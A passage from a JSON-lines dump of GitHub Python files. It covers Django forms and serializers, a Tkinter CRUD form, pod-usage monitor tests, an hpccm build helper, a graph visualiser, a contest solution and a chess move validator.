self.fields['capacitador'].queryset.filter(id=capacitador.id)\n self.fields['capacitador'].label_from_instance = lambda obj: '{}'.format(obj.get_full_name())\n\n\nclass GrupoForm(forms.ModelForm):\n class Meta:\n model = Grupo\n fields = '__all__'\n widgets = {\n 'sede': forms.Select(attrs={'class': 'select2'})\n }\n\n\nclass SedeFilterForm(forms.Form):\n capacitador = forms.ModelChoiceField(\n queryset=User.objects.filter(groups__name='cyd_capacitador'),\n widget=forms.Select(attrs={'class': 'form-control', 'data-url': 
reverse_lazy('sede_api_list')}))\n    sede = forms.ModelChoiceField(\n        queryset=Sede.objects.all(),\n        widget=forms.Select(attrs={'class': 'form-control'}))\n\n    def __init__(self, *args, **kwargs):\n        super(SedeFilterForm, self).__init__(*args, **kwargs)\n        self.fields['capacitador'].label_from_instance = lambda obj: \"%s\" % obj.get_full_name()\n\n\nclass CalendarioFilterForm(forms.Form):\n    sede = forms.ModelChoiceField(\n        queryset=Sede.objects.all(),\n        widget=forms.Select(attrs={'class': 'form-control select2', 'data-url': reverse_lazy('grupo_api_list')}))\n    grupo = forms.ChoiceField(\n        widget=forms.Select(attrs={'class': 'form-control', 'data-url': reverse_lazy('calendario_api_list')}))\n\n\nclass ParticipanteBaseForm(forms.ModelForm):\n    \"\"\"\n    Basic form for creating a :class:`Participante`\n    \"\"\"\n    udi = forms.CharField(\n        widget=forms.TextInput(attrs={'data-url': reverse_lazy('escuela_api_list')}))\n\n    class Meta:\n        model = Participante\n        fields = [\n            'udi', 'nombre', 'apellido', 'dpi', 'genero', 'rol',\n            'mail', 'tel_movil']\n        exclude = ('slug',)\n        widgets = {\n            'nombre': forms.TextInput(attrs={'class': 'form-reset'}),\n            'apellido': forms.TextInput(attrs={'class': 'form-reset'}),\n            'dpi': forms.TextInput(attrs={'class': 'form-reset', 'data-url': reverse_lazy('participante_api_list')}),\n            'mail': forms.TextInput(attrs={'class': 'form-reset'}),\n            'tel_movil': forms.TextInput(attrs={'class': 'form-reset'})\n        }\n\n\nclass ParticipanteForm(ParticipanteBaseForm):\n    \"\"\"\n    This form is used to create participants from a listing.\n    The fields carry URLs so the API can be queried from the template.\n    \"\"\"\n    sede = forms.ModelChoiceField(\n        queryset=Sede.objects.none(),\n        widget=forms.Select(attrs={'class': 'select2', 'data-url': reverse_lazy('grupo_api_list')}))\n    grupo = forms.ModelChoiceField(\n        queryset=Grupo.objects.none(),\n        widget=forms.Select(attrs={'data-url': reverse_lazy('participante_api_list')}))\n\n    class Meta:\n        model = Participante\n        fields = [\n            'sede', 'grupo', 'udi', 'nombre', 'apellido', 'dpi', 'genero', 'rol',\n            'mail', 'tel_movil']\n        exclude = ('slug',)\n\n\nclass ParticipanteBuscarForm(ParticipanteForm, GeoForm, forms.ModelForm):\n    nombre = forms.CharField(required=False)\n    capacitador = forms.ModelChoiceField(\n        queryset=User.objects.filter(groups__name='cyd_capacitador'))\n\n    class Meta:\n        model = Participante\n        fields = ['nombre', 'capacitador']\n\n    def __init__(self, *args, **kwargs):\n        super(ParticipanteBuscarForm, self).__init__(*args, **kwargs)\n        self.fields['capacitador'].label_from_instance = lambda obj: \"%s\" % obj.get_full_name()\n        self.fields.pop('grupo')\n\n\nclass ParticipanteAsignarForm(ParticipanteBaseForm):\n    def __init__(self, *args, **kwargs):\n        super(ParticipanteAsignarForm, self).__init__(*args, **kwargs)\n        self.fields.pop('udi')\n\n\nclass AsesoriaForm(forms.ModelForm):\n    \"\"\"Form for creating :model:`cyd.Asesoria` from the sede profile.\"\"\"\n\n    class Meta:\n        model = Asesoria\n        fields = '__all__'\n        widgets = {\n            'sede': forms.HiddenInput(),\n            'fecha': forms.TextInput(attrs={'class': 'datepicker form-control'}),\n            'hora_inicio': forms.TextInput(attrs={'class': 'form-control'}),\n            'hora_fin': forms.TextInput(attrs={'class': 'form-control'}),\n            'observacion': forms.TextInput(attrs={'class': 'form-control'})\n        }\n\n\nclass GrupoListForm(forms.Form):\n    \"\"\"Form for listing :model:`cyd.Grupo` in a :model:`cyd.Sede`.\n    Used to copy the participants of one group to other groups.\n    \"\"\"\n    grupo = 
forms.ModelChoiceField(Grupo)\n","repo_name":"Epatzan/app-suni","sub_path":"src/apps/cyd/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"es","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"26053169761","text":"\"\"\"Different helper functions for generating container recipe\n\"\"\"\n\nfrom typing import List, Union\n\nfrom hpccm.templates.git import git\nfrom hpccm.templates.CMakeBuild import CMakeBuild\n\nimport xcc.config\n\n\ndef build_git_and_cmake(\n name: str,\n url: str,\n branch: str,\n config: xcc.config.XCC_Config,\n opts=[],\n) -> List[str]:\n \"\"\"Combines git clone, cmake and cmake traget='install'\n\n :param name: name of the project\n :type name: str\n :param url: git clone url\n :type url: str\n :param branch: branch or version (git clone --branch)\n :type branch: str\n :param config: Configuration object, which contains different information for the stage\n :type config: xcc.config.XCC_Config\n :param opts: a list of CMAKE arguments (e.g. -DCMAKE_BUILD_TYPE=RELEASE)\n :type opts: List[str]\n :returns: list of bash commands for git and cmake\n :rtype: List[str]\n\n \"\"\"\n # commands\n cm = [\n \"\",\n \"#///////////////////////////////////////////////////////////\",\n \"{:<58}\".format(\"#// Build \" + name) + \"//\",\n \"#///////////////////////////////////////////////////////////\",\n ]\n\n git_conf = git()\n cm.append(\n git_conf.clone_step(\n repository=url, branch=branch, path=config.build_prefix, directory=name\n )\n )\n cmake_conf = CMakeBuild(prefix=config.install_prefix)\n cm_build_dir = config.build_prefix + \"/\" + name + \"_build\"\n cm_source_dir = config.build_prefix + \"/\" + name\n cm.append(\n cmake_conf.configure_step(\n build_directory=cm_build_dir, directory=cm_source_dir, opts=opts\n )\n )\n cm.append(cmake_conf.build_step(parallel=config.get_cmake_compiler_threads(), target=\"install\"))\n if not config.keep_build:\n config.paths_to_delete.append(cm_build_dir)\n config.paths_to_delete.append(cm_source_dir)\n return cm\n\ndef add_libcxx_cmake_arg(inputList: List[str]) -> List[str]:\n \"\"\"If the class attribute build_libcxx is true, add -DCMAKE_CXX_FLAGS=\"-stdlib=libc++\" to cmake flags in inputlist.\n\n :param inputlist: List of cmake flags\n :type inputlist: List[str]\n :returns: inputlist plus -DCMAKE_CXX_FLAGS=\"-stdlib=libc++\" if self.build_libcxx is true\n :rtype: List[str]\n\n \"\"\"\n for i, elem in enumerate(inputList):\n if elem.startswith('-DCMAKE_CXX_FLAGS=\"'):\n inputList[i] = elem[:-1] + ' -stdlib=libc++\"'\n return inputList\n\n inputList.append('-DCMAKE_CXX_FLAGS=\"-stdlib=libc++\"')\n return inputList\n","repo_name":"ComputationalRadiationPhysics/xeus-cling-cuda-container","sub_path":"xcc/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37591838762","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom BLL import tip_material_bll\nfrom DTO import tip_material_dto\n\n\nclass FrmCadTipMaterial(Toplevel):\n def __init__(self, master=None):\n Toplevel.__init__(self, master)\n\n self.title('Cadastro de Tipo de Material')\n w = 440\n h = 450\n x = (self.winfo_screenwidth() / 2) - w / 2\n y = (self.winfo_screenheight() / 2) - h / 2\n self.geometry('%dx%d+%d+%d' %(w, h, x, y))\n\n self.resizable(0,0)\n self.grab_set()\n\n self.var_descricao = StringVar()\n self.var_id = StringVar()\n 
self.var_msg = StringVar()\n\n self.criar_widgets()\n\n self.preparar()\n\n def limpar(self):\n self.var_id.set('')\n self.var_descricao.set('')\n self.var_msg.set('')\n\n def preparar(self):\n self.limpar()\n self.txt_descricao['state'] = 'disabled'\n self.btn_gravar['state'] = 'disabled'\n self.btn_excluir['state'] = 'disabled'\n self.listar()\n\n def criar_widgets(self):\n fonte_padrao = 'Verdana 10 bold'\n\n fr0 = Frame(self, borderwidth=1, relief=SOLID)\n fr0.place(height=50, width=420, x=10, y=10)\n\n frm = Frame(self, borderwidth=1, relief=SOLID)\n frm.place(height=370, width=420, x=10, y= 70)\n\n self.lbl_msg = Label(fr0, text='', textvariable=self.var_msg, font=('Tahoma 22 bold'), relief=RAISED, width=15, bg='#B0C4DE')\n self.lbl_msg.pack(expand=True, fill=X)\n\n Label(frm, text='ID:', font=fonte_padrao).place(x=10, y=10)\n self.lbl_id = Label(frm, font=fonte_padrao, relief=SOLID, width=15, textvariable=self.var_id, anchor=W, bg='#C0C0C0')\n self.lbl_id.place(x=10, y=30)\n\n Label(frm, text='Descrição:', font=fonte_padrao).place(x=10, y=60)\n self.txt_descricao = Entry(frm, font=fonte_padrao, width=25, relief=SOLID, textvariable=self.var_descricao)\n self.txt_descricao.place(x=10, y=80)\n\n self.treeview = ttk.Treeview(frm, columns=('a'))\n self.treeview.column('#0', width=5)\n self.treeview.heading('#0', text='ID', anchor=W)\n self.treeview.heading('#1', text='DESCRIÇÃO', anchor=W)\n\n vsb = ttk.Scrollbar(frm, orient=VERTICAL, command=self.treeview.yview)\n\n self.treeview.configure(yscrollcommand=vsb.set)\n\n self.treeview.bind('<>', self.item_selecionado)\n\n vsb.place(x=385, y=120, height=200)\n self.treeview.place(x=10, y=120, width=385, height=200)\n\n self.btn_novo = Button(frm, text='Novo', font=fonte_padrao, width=7, command=self.novo)\n self.btn_novo.place(x=10, y=330)\n self.btn_gravar = Button(frm, text='Gravar', font=fonte_padrao, width=7, command=self.gravar)\n self.btn_gravar.place(x=90, y=330)\n self.btn_excluir = Button(frm, text='Excluir', font=fonte_padrao, width=7, command=self.excluir)\n self.btn_excluir.place(x=170, y=330)\n\n def listar(self):\n bll = tip_material_bll.TipMaterialBll()\n r = bll.retornar_dados('todos')\n\n self.treeview.delete(*self.treeview.get_children())\n\n for i in r:\n self.treeview.insert('', 'end', text=str(i[0]), values=(i[1]))\n\n def novo(self):\n self.limpar()\n self.txt_descricao.focus()\n self.txt_descricao['state'] = 'normal'\n self.btn_gravar['state'] = 'normal'\n self.btn_excluir['state'] = 'disabled'\n self.var_msg.set('Novo Registro')\n self.lbl_msg['fg'] = '#00008B'\n\n def excluir(self):\n p = messagebox.askquestion('Excluir', 'Deseja excluir este registro?', parent=self)\n if p == 'yes':\n bll = tip_material_bll.TipMaterialBll()\n ID = int(self.var_id.get())\n r = bll.excluir(ID)\n if r == 1:\n messagebox.showinfo('Excluído', 'Registro excluído com sucesso!', parent=self)\n self.preparar()\n else:\n messagebox.showerror('Erro', str(r), parent=self)\n\n def gravar(self):\n obj = tip_material_dto.TipMaterialDto()\n obj.descricao = self.var_descricao.get().upper()\n ID = self.var_id.get()\n bll = tip_material_bll.TipMaterialBll()\n v = bll.validar_campo(obj)\n if v != 'OK':\n messagebox.showwarning('Aviso', str(v), parent=self)\n return\n \n if ID == '':\n r = bll.inserir(obj)\n msg = 'Registro incluído com sucesso!'\n else:\n obj.ID = int(ID)\n r = bll.editar(obj)\n msg = 'Registro alterado com sucesso!'\n\n if r == 1:\n messagebox.showinfo('Gravado', msg, parent=self)\n self.preparar()\n else:\n 
messagebox.showerror('Erro', str(r), parent=self)\n\n def item_selecionado(self, event):\n ID = self.treeview.focus()\n tupla = (int(self.treeview.item(ID)['text']), str(self.treeview.item(ID)['values'][0]))\n\n self.var_id.set(str(tupla[0]))\n self.var_descricao.set(str(tupla[1]))\n\n self.txt_descricao['state'] = 'normal'\n self.btn_gravar['state'] = 'normal'\n self.btn_excluir['state'] = 'normal'\n\n self.var_msg.set('Alterar Registro')\n self.lbl_msg['fg'] = '#A52A2A'\n","repo_name":"Valterlande/ProjetoTigre","sub_path":"GUI_TKINTER/frm_cad_tip_material.py","file_name":"frm_cad_tip_material.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24933828566","text":"from . import serializers, Person, Address, PhoneNumber, Email, BasicEmailSerializer, \\\n BasicPhoneNumberSerializer, BasicAddressSerializer, AddressSerializer, PhoneNumberSerializer, EmailSerializer\n\n\nclass PersonSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n\n class Meta:\n model = Person\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'date_of_birth',\n )\n\n\nclass CreatePersonSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n addresses = BasicAddressSerializer(many=True, required=False)\n phone_numbers = BasicPhoneNumberSerializer(many=True)\n emails = BasicEmailSerializer(many=True)\n\n def create(self, validated_data):\n person = Person(\n first_name=validated_data.get('first_name'),\n last_name=validated_data.get('last_name'),\n date_of_birth=validated_data.get('date_of_birth'),\n )\n\n person.save()\n\n phone_number_objects = self.create_phone_numbers(validated_data.get('phone_numbers'), person)\n email_objects = self.create_emails(validated_data.get('emails'), person)\n address_objects = []\n\n if validated_data.get('addresses'):\n address_objects = self.create_addresses(validated_data.get('addresses'), person)\n\n return {\n 'id': person.id,\n 'first_name': person.first_name,\n 'last_name': person.last_name,\n 'date_of_birth': person.date_of_birth,\n 'addresses': address_objects,\n 'phone_numbers': phone_number_objects,\n 'emails': email_objects\n }\n\n def create_addresses(self, address_data, person):\n addresses = [Address(**address, person=person) for address in address_data]\n address_objects = Address.objects.bulk_create(addresses)\n return address_objects\n\n def create_phone_numbers(self, phone_number_data, person):\n phone_numbers = [PhoneNumber(**phone_number, person=person) for phone_number in phone_number_data]\n phone_number_objects = PhoneNumber.objects.bulk_create(phone_numbers)\n return phone_number_objects\n\n def create_emails(self, email_data, person):\n emails = [Email(**email, person=person) for email in email_data]\n email_objects = Email.objects.bulk_create(emails)\n return email_objects\n\n\nclass PersonListSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n date_of_birth = serializers.DateField()\n addresses = AddressSerializer(many=True, read_only=True)\n phone_numbers = 
PhoneNumberSerializer(many=True, read_only=True)\n emails = EmailSerializer(many=True, read_only=True)\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.prefetch_related('phone_numbers').prefetch_related('emails').prefetch_related(\n 'addresses').order_by('first_name')\n return queryset\n\n class Meta:\n model = Person\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'date_of_birth',\n 'addresses',\n 'phone_numbers',\n 'emails'\n )","repo_name":"domface/servicefusion","sub_path":"api/addresses/serializers/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72232924888","text":"import datetime\nimport logging\nimport time\nimport unittest\n\nfrom dateutil.tz import tzutc\nfrom sqlalchemy.orm import sessionmaker\n\nfrom usage.model import session_scope, Usage, get_engine, MonthlyReport, RunningPod\nfrom usage.report import generate_reports, generate_report, create_report_working_table\nfrom usage.running_pods_monitor import update_finished_time, EVENT_REQUEST_TIMEOUT, \\\n update_finished_time_for_no_event_pods\n\nUNFINISHED_UID = 'i-am-a-unfinished-pod'\nNO_USAGE_UID = 'event-existing-but-no-usage'\n\ndb_connection = 'postgresql://postgres:mysecretpassword@localhost:5432/postgres'\n\n\ndef is_local_database_available():\n try:\n with session_scope(db_connection) as s:\n result = s.bind.execute('SELECT version()').fetchall()\n for row in result:\n return True\n except Exception:\n return False\n\n\ndef create_test_data(uid=UNFINISHED_UID):\n u = Usage()\n u.uid = uid\n u.pod_name = 'i-am-a-unfinished-pod'\n u.group_name = 'test'\n u.user_name = 'test'\n u.component = 'jupyter'\n u.component_name = 'foo-bar'\n u.instance_type = 'cpu-1'\n u.gpu = 0\n u.cpu = 1\n u.memory = 1024 ** 3\n u.poke_updated_time()\n u.scheduled_time = datetime.datetime(2020, 1, 1, 18, 00, 00, tzinfo=tzutc())\n u.finished_time = None\n return u\n\n\ndef create_event(uid):\n event = RunningPod()\n event.uid = uid\n event.scheduled_time = datetime.datetime.utcnow()\n event.updated_time = datetime.datetime.utcnow() - datetime.timedelta(seconds=EVENT_REQUEST_TIMEOUT)\n with session_scope(db_connection) as s:\n s.add(event)\n\n\nclass TestRunningPods(unittest.TestCase):\n\n def setUp(self) -> None:\n if not is_local_database_available():\n self.skipTest('Skip regression tests, because localhost:5432/postgres is not available')\n\n with session_scope(db_connection) as s:\n data = create_test_data()\n s.add(data)\n self.usage = data\n\n def tearDown(self) -> None:\n if is_local_database_available():\n with session_scope(db_connection) as s:\n s.delete(self.usage)\n\n with session_scope(db_connection) as s:\n self.running_pod_by_uid(s).delete()\n s.query(RunningPod).filter_by(uid=NO_USAGE_UID).delete()\n\n def test_running_pods_event_existing_without_usage_data(self):\n # there is an event in primehub_running_pods table without related usage\n create_event(NO_USAGE_UID)\n\n # invoke updater\n update_finished_time(db_connection)\n\n # verifying the event has gone\n self.verify_event_deleted(NO_USAGE_UID)\n\n def verify_event_deleted(self, uid):\n with session_scope(db_connection) as s:\n result = s.query(RunningPod).filter_by(uid=uid).one_or_none()\n self.assertIsNone(result)\n\n def test_unfinished_pods(self):\n # there is an unfinished pod in primehub_usages table\n # there is an event in primehub_running_pods table\n create_event(UNFINISHED_UID)\n\n # 
pre-condition\n # we found data both in usage and event\n with session_scope(db_connection) as s:\n self.assertIsNotNone(self.running_pod_by_uid(s).one())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNone(usage.finished_time)\n\n # invoke updater at the first round\n update_finished_time(db_connection)\n\n # verify usage marked finished\n with session_scope(db_connection) as s:\n self.assertIsNotNone(self.running_pod_by_uid(s).one())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNotNone(usage.finished_time)\n\n # invoke updater at the second round\n update_finished_time(db_connection)\n\n # verify usage still marked finished and event is deleted\n with session_scope(db_connection) as s:\n self.assertIsNone(self.running_pod_by_uid(s).one_or_none())\n\n # before updating the finished_time is none\n usage = s.query(Usage).filter_by(uid=UNFINISHED_UID).one()\n self.assertIsNotNone(usage.finished_time)\n\n def running_pod_by_uid(self, s):\n return s.query(RunningPod).filter_by(uid=UNFINISHED_UID)\n\n\nUID_FOR_POD_WITHOUT_EVENTS = 'pod-without-event'\n\n\nclass TestEventsNotExistingInRunningPods(unittest.TestCase):\n\n def setUp(self) -> None:\n if not is_local_database_available():\n self.skipTest('Skip regression tests, because localhost:5432/postgres is not available')\n\n def tearDown(self) -> None:\n if is_local_database_available():\n with session_scope(db_connection) as s:\n s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).delete()\n\n def test_finished_pods_without_any_events(self):\n # there is an unfinished pod in primehub_usages table\n # there is no events in primehub_running_pods table\n\n with session_scope(db_connection) as s:\n s.add(create_test_data(uid=UID_FOR_POD_WITHOUT_EVENTS))\n\n # verify the pod has not finished yet\n with session_scope(db_connection) as s:\n self.assertIsNone(s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).one().finished_time)\n\n # patch the finished time in pods without events\n update_finished_time_for_no_event_pods(db_connection)\n\n # verify finished_time should be updated_time\n with session_scope(db_connection) as s:\n usage = s.query(Usage).filter_by(uid=UID_FOR_POD_WITHOUT_EVENTS).one()\n self.assertEqual(usage.updated_time, usage.finished_time)\n","repo_name":"InfuseAI/primehub-usage","sub_path":"tests/test_running_pods_monitor.py","file_name":"test_running_pods_monitor.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37917635335","text":"def validate_move(chess_board, from_coordinate, to_coordinate):\n \"\"\"white piece moves first - can work this out by having \"\"\"\n if not _validate_coordinate(from_coordinate):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not _validate_coordinate(to_coordinate):\n print(\"failed at line 6\", to_coordinate)\n raise ValidationException(\"Please enter valid coordinates\")\n\n from_piece = chess_board.get(from_coordinate)\n if from_piece == None:\n print(\"Are you blind! 
there's nothing here\")\n raise ValidationException(\"Please enter valid coordinates\")\n\n if chess_board.get(to_coordinate) != None:\n if from_piece[2] == chess_board.get(to_coordinate)[2]:\n raise ValidationException(\"Please enter valid coordinates\")\n\n from_column_number = coordinate_to_column_number(from_coordinate)\n to_column_number = coordinate_to_column_number(to_coordinate)\n\n if from_piece[0] == \"K\":\n return _validate_king_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"P\":\n return _validate_pawn_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"C\":\n return _validate_rook_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"B\":\n return _validate_bishop_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"Q\":\n return _validate_queen_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n elif from_piece[0] == \"H\":\n return _validate_knight_move(chess_board, from_coordinate, to_coordinate, from_column_number, to_column_number)\n\n return True\n\ndef _validate_coordinate(coordinate):\n\n if not len(coordinate) == 2:\n raise ValidationException(\"make sure you enter a 2 character coordinate\")\n if not coordinate[0] in \"ABCDEFGH\":\n print(\"not valid column\")\n raise ValidationException(\"Please enter valid coordinates\")\n if not coordinate[1] in \"12345678\":\n print(\"not valid row\")\n raise ValidationException(\"Please enter valid coordinates\")\n if len(coordinate) != 2:\n raise ValidationException(\"Please enter valid coordinates\")\n return True\n\ndef coordinate_to_column_number(coordinate):\n column = \"ABCDEFGH\"\n column_coordinate = column.index(coordinate[0])\n return column_coordinate\n\ndef _validate_king_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n \"\"\"\"validate the from_coordinates is within one of the to_coordinates\"\"\"\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n if not (to_row -1 <= from_row <= to_row +1):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not (to_column_number -1 <= from_column_number <= to_column_number +1):\n raise ValidationException(\"Please enter valid coordinates\")\n\n return True\n\ndef _validate_pawn_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n\n from_piece_colour = chess_board.get(from_coordinates)[2]\n if from_piece_colour == \"B\":\n direction = -1\n else:\n direction = +1\n\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n if chess_board.get(to_coordinates) is None:\n if not from_column_number == to_column_number:\n raise ValidationException(\"Please enter valid coordinates\")\n\n \"\"\"if to_co-ordinate is diagonally forward from from position\"\"\"\n # direction = from_column_number\n if ((from_column_number == to_column_number +1 or from_column_number == to_column_number -1) \\\n and to_row == from_row + direction) and chess_board.get(to_coordinates) == None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n# \"\"\"adding things here to validate the last line in test Validate using ands AND ors\"\"\"\n if not (to_row == from_row + direction\n or ((from_row == 7 or from_row == 2) and to_row == from_row + (direction * 2))):\n\n 
raise ValidationException(\"Not a standard pawn move\")\n\n\n return True\n\ndef _validate_rook_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # from_piece_colour = chess_board.get(from_coordinates)[2]\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n if not (from_column_number == to_column_number or from_row == to_row):\n raise ValidationException(\"Please enter valid coordinates\")\n\n if not from_row == to_row:\n if from_row >= to_row:\n x = range(to_row+1, from_row)\n else:\n x = range(from_row+1, to_row)\n\n for i in x:\n test_coordiante = from_coordinates[0]+ str(i)\n if chess_board.get(test_coordiante) != None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n else:\n if from_column_number >= to_column_number:\n y = range(to_column_number + 1, from_column_number)\n else:\n y = range(from_column_number + 1, to_column_number)\n\n for i in y:\n test_coordiante = \"ABCDEFGH\"[i] + from_coordinates[1]\n if chess_board.get(test_coordiante) != None:\n raise ValidationException(\"Please enter valid coordinates\")\n\n # print(\"x\",x)\n # y = range(from_column_number, to_column_number)\n # print(\"y\",y)\n # from_coordinates = from_column_number and from_row\n # print(\"from coord\",from_coordinates)\n # to_coordinates = to_column_number and to_row\n # print(\"to coord\",to_coordinates)\n #\n # if from_column_number == to_column_number:\n # x +\n # return False\n return True\n\ndef _validate_bishop_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # bishop = chess_board.get(from_coordinates)[0] == \"B\"\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n move = [(to_column_number - from_column_number),(to_row - from_row)]\n\n if not abs(move[0]) == abs(move[1]):\n raise ValidationException(\"Please enter valid coordinates.3\")\n\n return True\n\ndef _validate_knight_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n from_row = int(from_coordinates[1])\n to_row = int(to_coordinates[1])\n\n move = [abs(to_column_number - from_column_number), abs(to_row - from_row)]\n\n if not (move[0] == 1 and move[1] == 2 or move[0] == 2 and move[1] == 1):\n raise ValidationException(\"Please enter valid coordinates\")\n return True\n\ndef _validate_queen_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number):\n # from_coordiantes = chess_board.get(from_coordinates)\n # to_coordiantes = chess_board.get(to_coordinates)\n\n return _validate_rook_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number)\\\n or _validate_bishop_move(chess_board, from_coordinates, to_coordinates, from_column_number, to_column_number)\n\n\n # if not _validate_rook_move(che)\n\nclass ValidationException(Exception):\n pass","repo_name":"younism1/Chess-Project","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74235404247","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.classes.graph import Graph\n\nabspath = \"C:\\\\Users\\\\mabet\\\\OneDrive - Aarhus Universitet\\\\Datalogi\\\\Bachelor projekt\"\n_file = \"\\\\BSc_project\\\\GraphsGeneration\\\\processed_graphs\\\\num_nodes\\\\0\\\\2.txt\"\npath_to_graph = abspath+_file # file 0.0\n\n# file_ending = \"698\"\n# r = 
open(f\"processed_graphs/facebook_{file_ending}.edges\", \"r\")\n\nr = open(path_to_graph, \"r\")\n\nclass GraphVisualization:\n \n def __init__(self):\n \n # visual is a list which stores all \n # the set of edges that constitutes a\n # graph\n self.visual = []\n \n # addEdge function inputs the vertices of an\n # edge and appends it to the visual list\n def addEdge(self, a, b):\n temp = [a, b]\n self.visual.append(temp)\n \n # In visualize function G is an object of\n # class Graph given by networkx G.add_edges_from(visual)\n # creates a graph with a given list\n # nx.draw_networkx(G) - plots the graph\n # plt.show() - displays the graph\n def visualize(self):\n G = nx.Graph()\n G.add_edges_from(self.visual)\n nx.draw_networkx(G)\n plt.show()\n \nG = GraphVisualization()\nlines = r.readlines()\nfor line in lines:\n a,b,p = line.split()\n G.addEdge(a,b)\nG.visualize()\n ","repo_name":"Sloeschcke/Disvocering-k-most-reliable-subgraphs-within-uncertain-graphs---BSc_project","sub_path":"GraphsGeneration/GraphVisualizer.py","file_name":"GraphVisualizer.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4876602233","text":"import random\n\ndef compute_power_p(n):\n global m, p\n arr = [0] * n\n arr[0] = 1\n for i in range(1, n):\n arr[i] = (arr[i-1] * p) % m\n\n return tuple(arr)\n\ndef rand_gen_da(n):\n global p_powers, k\n\n tab = {}\n tab1 = {}\n da = [0] * n\n c = 0\n n_zeros = n\n while True:\n ai = random.randint(-(k-1), k-1)\n i = random.randint(0, n-1)\n\n if da[i] == 0:\n n_zeros -= 1\n\n dai = (m + (ai - da[i]) % m) % m\n c = (c + dai * p_powers[i]) % m\n\n da[i] = ai\n\n if da[i] == 0:\n n_zeros += 1\n\n if n_zeros < n:\n if c == 0:\n return da\n\n tda = None\n if c not in tab:\n tda = tuple(da)\n tab[c] = tda\n\n pnc = (p_powers[n] * c) % m\n # c0 + p**n * c == 0 ???\n c0 = (m - pnc) % m\n if c0 in tab:\n res = list(tab[c0])\n res.extend(da)\n return res\n\n if pnc not in tab1:\n tda = tda or tuple(da)\n tab1[pnc] = tda\n\n pnc1 = (m - c) % m\n if pnc1 in tab1:\n res = list(da)\n res.extend(tab1[pnc1])\n return res\n\n assert False\n\nif __name__ == \"__main__\":\n n, k, p, m = input().strip().split(' ')\n n, k, p, m = [int(n), int(k), int(p), int(m)]\n p_powers = compute_power_p(n+1)\n\n da = rand_gen_da(n)\n n = len(da)\n a = [0] * n\n b = [0] * n\n for i in range(n):\n dai = da[i]\n if dai >= 0:\n a[i] = 1\n b[i] = 1 + dai\n else:\n a[i] = k\n b[i] = k + dai\n\n a.reverse()\n b.reverse()\n\n print(' '.join([str(x) for x in a]))\n print(' '.join([str(x) for x in b]))\n\n","repo_name":"vchernoy/coding","sub_path":"contests/2017/goldman_sachs_codesprint/transaction_certificates/transaction_certificates.py","file_name":"transaction_certificates.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2789151295","text":"import nltk\nfrom nltk.tokenize import NLTKWordTokenizer\nfrom pycocotools.coco import COCO\nimport os\nimport pickle\nimport gensim.downloader\nimport numpy as np\nfrom collections import OrderedDict, Counter\n\n\nfrom COCO_Caption import DATASET_ROOT\n\nfrom Levenshtein import distance as lev_dist\n\nfrom 